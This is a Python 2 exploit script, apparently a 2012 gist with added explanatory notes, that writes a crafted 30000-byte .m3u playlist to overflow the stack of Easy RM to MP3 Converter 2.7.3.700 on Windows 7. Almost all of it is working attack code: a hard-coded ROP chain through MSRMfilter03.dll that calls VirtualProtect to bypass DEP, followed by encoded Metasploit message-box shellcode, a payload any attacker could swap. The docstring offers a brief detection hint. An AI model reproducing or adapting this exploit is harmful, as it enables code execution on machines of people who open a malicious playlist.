Created
November 10, 2012 21:29
Easy RM to MP3 Converter - ".m3u" Windows 7 DEP + ASLR Local Exploit
#!/usr/bin/python
# Easy RM to MP3 Converter - Windows 7 DEP + ASLR Local Exploit
# Version 2.7.3.700 on Windows 7
# Tested: Windows 7 Ultimate SP0 - English
# Author: Simon Pinfold
"""Write a crafted ``file.m3u`` (exactly 30000 bytes) for Easy RM to MP3 Converter 2.7.3.700.

Layout of the generated file, as built below: a 26088-byte ``'A'`` filler, a
ROP chain made entirely of hard-coded addresses inside MSRMfilter03.dll
(0x1000xxxx) that resolves kernel32 VirtualProtect through that module's IAT
and requests protection 0x40 on a 0x200-byte stack region, then a
Metasploit ``windows/messagebox`` payload, padded with ``'C'`` up to 30000 bytes.

Notes for the reader:
- Python 2 only: the ``file()`` builtin and ``str``-as-bytes are used;
  Python 3 has no ``file`` and would need ``bytes`` throughout.
- Every gadget address is fixed, so the chain presumably requires
  MSRMfilter03.dll at its preferred base and RM2MP3Converter.exe at
  0x00400000 (the pushad gadget is 0x00410a31) - i.e. the "ASLR bypass"
  rests on a non-relocated module, not on an address leak. TODO confirm
  against the tested build.
- Detection angle: the output is a 30000-byte playlist of long
  single-character runs with no newline, which is easy to distinguish from
  a real .m3u by simple content inspection; opening untrusted playlists in
  this converter version is the exposure to mitigate.
"""
import struct, os
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, EXITFUNC=process, TITLE=Check, TEXT=Code
# Execution!, ICON=NO
# Badchars = '\x00\xff\x0a\x0d'
#
payload = ( "\xbb\x5c\x96\xd6\x1f\xd9\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x42\x31\x5e\x13\x83\xc6\x04\x03\x5e\x53\x74\x23\xc6\x80\xe3"
"\x15\x8d\x72\xe0\x97\xbc\xc8\x7f\xe9\x89\x48\x0b\x78\x3a\x1b"
"\x7d\x77\xb1\x6d\x9e\x0c\x83\x99\x15\x6c\x2c\x12\x1f\xa9\x63"
"\x3c\x15\x3a\x22\x3d\x04\x43\x34\x5d\x2d\xd0\x93\xb9\xba\x6c"
"\xe0\x4a\xe8\x46\x60\x4d\xfb\x1c\xda\x55\x70\x78\xfb\x64\x6d"
"\x9e\xcf\x2f\xfa\x55\xbb\xae\x12\xa4\x44\x81\x2a\x3b\x16\x65"
"\x6a\xb0\x60\xa4\xa4\x34\x6e\xe1\xd0\xb3\x4b\x91\x02\x14\xd9"
"\x88\xc0\x3e\x05\x4b\x3c\xd8\xce\x47\x89\xae\x8b\x4b\x0c\x5a"
"\xa0\x77\x85\x9d\x5f\xfe\xdd\xb9\x83\x61\x1d\x73\xb3\x48\x75"
"\xfd\x21\x03\xb7\x96\x27\x5d\x36\x8b\x6a\x89\xd9\xac\x74\xb6"
"\x6f\x17\x8f\xf3\x0e\x40\x6d\x70\x68\x6c\x56\x24\x9e\x03\x69"
"\x37\xa1\x95\xd3\xcf\x36\xca\xb7\xef\x87\x7a\x7b\xdd\x29\x1f"
"\x13\x54\x45\xba\x91\x1e\xf5\x60\x5c\x97\xe0\x3f\x9f\xf2\xe8"
"\x36\x9d\xac\x4b\xe0\x80\x01\x10\x76\xd8\xbd\x3a\x91\x80\x42"
"\x45\x9e\x2b\xd7\xe2\x41\x8c\x4f\x50\xea\xa9\xec\x67\x31\xb9"
"\xae\xa3\xc0\x33\xad\xc4\xa5\x2d\x10\x4d\x52\xd1\x27\x19\xcb"
"\x7d\xe7\xa4\x73\x1b\x8f\x65\xeb\x87\x2a\x5b\x3a\xcf\xf8\xbf"
"\xb3\x59\xe1\xf1\x19\x33\xd1\xa2\xcc\x96\xee\x95\xde\xd6\x40"
"\xe9\x74\xdf" )
# Filler up to the overwritten return address (offset chosen by the author;
# presumably the saved return address on the stack - not verified here).
buffer = 'A' * 26088
buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll]
buffer += 'A' * 4
####################################### EDI = kernel32.dll.virtualprotect ########################################
# Clobbers: EAX, ESI, EBX
buffer += struct.pack('<I', 0x10029822) # POP EAX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x10032048) # (MSRMfilter03.dll - IAT 0x10032048 : kernel32.dll.terminateprocess (0x76af509b), offset to kernel32.dll.virtualprotect (0x76af50ab) : 16
# EAX = &kernel32.dll.terminateprocess
buffer += struct.pack('<I', 0x1002e0c8) # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [MSRMfilter03.dll]
# EAX = kernel32.dll.terminateprocess
# 16 x INC EAX: step from the TerminateProcess value to VirtualProtect (offset 16, see the IAT note above).
for i in range(0, 16):
    buffer += struct.pack('<I', 0x10023327) # INC EAX # RETN ** [MSRMfilter03.dll]
# EAX = kernel32.dll.virtualprotect
buffer += struct.pack('<I', 0x100128f7) # PUSH EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSRMfilter03.dll]
buffer += "A" * (4 * 2)
# EDI = kernel32.dll.virtualprotect (for now)
##########################################################################################################
# EDI = kernel32.dll.virtualprotect
################################ put a pushad gadget at ESP+0x100 on the stack ###########################
# Clobbers: EAX, ESI, EDX, EBP
buffer += struct.pack('<I', 0x10029822) # POP EAX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0xC91F1A34)
buffer += struct.pack('<I', 0x1002c67a) # XOR EAX,C95E1005 # RETN ** [MSRMfilter03.dll]
# EAX = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe]
buffer += struct.pack('<I', 0x10024e95) # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN ** [MSRMfilter03.dll]
# ECX = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe]
buffer += struct.pack('<I', 0x1002d63c) # POP EDX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x10066931) # &Writable location [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1002e892) # PUSH ESP # AND AL,10 # POP ESI # MOV DWORD PTR DS:[EDX],ECX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1002bc28) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1002f703) # ADD EAX,ESI # POP ESI # RETN ** [MSRMfilter03.dll]
buffer += "A" * 4
# EAX = ESP
# ESI = ESP
buffer += struct.pack('<I', 0x1002dc4c) # ADD EAX,100 # POP EBP # RETN ** [MSRMfilter03.dll]
buffer += "A" * 4
# EAX = ESP + 0x100
buffer += struct.pack('<I', 0x10030bb8) # MOV DWORD PTR DS:[EAX+4],ECX # RETN ** [MSRMfilter03.dll]
# [EAX + 4] = 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe]
##########################################################################################################
# EDI = kernel32.dll.virtualprotect
################################## ESI = kernel32.dll.virtualprotect (from EDI) ##########################
# Clobbers: EAX, EBP, EBX, ECX, EDI (duh)
buffer += struct.pack('<I', 0x1002c323) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x10011105) # MOV EAX,EDI # POP EDI # POP ESI # POP EBX # RETN ** [MSRMfilter03.dll]
buffer += "A" * (4 * 3)
buffer += struct.pack('<I', 0x1001a788) # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN ** [MSRMfilter03.dll]
buffer += "A" * (4 * 3)
##################################################################################################################
# ESI = kernel32.dll.virtualprotect
################################## EBP = ReturnTo (ptr to jmp esp), EDX = 0x40 ###########################
# Clobbers: EBX
buffer += struct.pack('<I', 0x1002c323) # XOR EAX,EAX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1002dc41) # ADD EAX,40 # POP EBP # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1001b058) # & push esp # ret [MSRMfilter03.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<I',0x100253bc) # XOR EDX,EDX # RETN ** [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1001bdee) # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN ** [MSRMfilter03.dll]
buffer += "A" * 8
buffer += struct.pack('<I', 0x10024ece) # ADD EDX,EBX # POP EBX # RETN 10 ** [MSRMfilter03.dll]
buffer += "A" * 4
# EDX = NewProtect (0x40)
##########################################################################################################
# ESI = kernel32.dll.virtualprotect
# EBP = ReturnTo (ptr to jmp esp)
# EDX = 0x40
############################################## EBX = dwSize (0x200) ######################################
# Clobbers: EAX
buffer += struct.pack('<I', 0x1002b93e) # POP EAX # RETN [MSRMfilter03.dll]
# These 0x10 bytes are skipped by the "RETN 10" of the gadget above, so the
# POP EAX takes the dword that follows them (not these 'A's).
buffer += "A" * 0x10
buffer += struct.pack('<I', 0xC424CEf0)
buffer += struct.pack('<I', 0x1002a14b) # ADD EAX,3BDB3310 # RETN ** [MSRMfilter03.dll]
#EAX = 0x200  (0xC424CEF0 + 0x3BDB3310 wraps past 32 bits to 0x200)
buffer += struct.pack('<I', 0x1001bdee) # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
buffer += "A" * 8 # ESP addition
# EBX = dwSize
##########################################################################################################
# ESI = kernel32.dll.virtualprotect
# EBP = ReturnTo (ptr to jmp esp)
# EDX = 0x40
# EBX = dwSize (0x200)
################################### ECX = &Writable location [MSRMfilter03.dll ]##########################
# Clobbers:
buffer += struct.pack('<I', 0x1001b1df) # POP ECX # RETN [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x10066931) # &Writable location [MSRMfilter03.dll]
# ECX = writable location
##########################################################################################################
# ESI = kernel32.dll.virtualprotect
# EBP = ReturnTo (ptr to jmp esp)
# EDX = 0x40
# EBX = dwSize (0x200)
# ECX = &Writable location [MSRMfilter03.dll ]
################################################# EDI = ROP NOP ##########################################
# Clobbers:
buffer += struct.pack('<I', 0x1002c051) # POP EDI # RETN [MSRMfilter03.dll]
buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll]
# EDI = ROP NOP (RETN)
##########################################################################################################
# ESI = kernel32.dll.virtualprotect
# EBP = ReturnTo (ptr to jmp esp)
# EDX = 0x40
# EBX = dwSize (0x200)
# ECX = &Writable location [MSRMfilter03.dll ]
# EDI = ROP NOP
################################################### EAX = NOPs ###########################################
# Clobbers:
buffer += struct.pack('<I', 0x1002b93e) # POP EAX # RETN [MSRMfilter03.dll]
buffer += "\x90" * 4
##########################################################################################################
# ESI = kernel32.dll.virtualprotect
# EBP = ReturnTo (ptr to jmp esp)
# EDX = 0x40
# EBX = dwSize (0x200)
# ECX = &Writable location [MSRMfilter03.dll ]
# EDI = ROP NOP
# EAX = NOPs
# 25 ROP NOPs pad the chain out to the slot at ESP+0x100+4 that was written earlier.
for i in range(0, 25):
    buffer += struct.pack('<I', 0x1001e802) # RETN (ROP NOP) [MSRMfilter03.dll]
buffer += "\x11" * 4 # Overwritten with 0x00410a31 : pushad | startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe]
buffer += "\x90" * 20
buffer += payload
# Pad the file to exactly 30000 bytes.
buffer += "C" * (30000 - len(buffer))
name = "file.m3u"
# Redundant with mode "w" below (which truncates), but harmless.
if os.path.exists(name):
    os.remove(name)
# Python 2 ``file()``; text mode "w" is only safe because the buffer is
# expected to contain no 0x0a/0x0d byte (see the Badchars line above), so
# Windows newline translation cannot alter it - TODO confirm for every packed
# gadget address as well as the payload.
f = file(name, "w")
f.write(buffer)
f.close()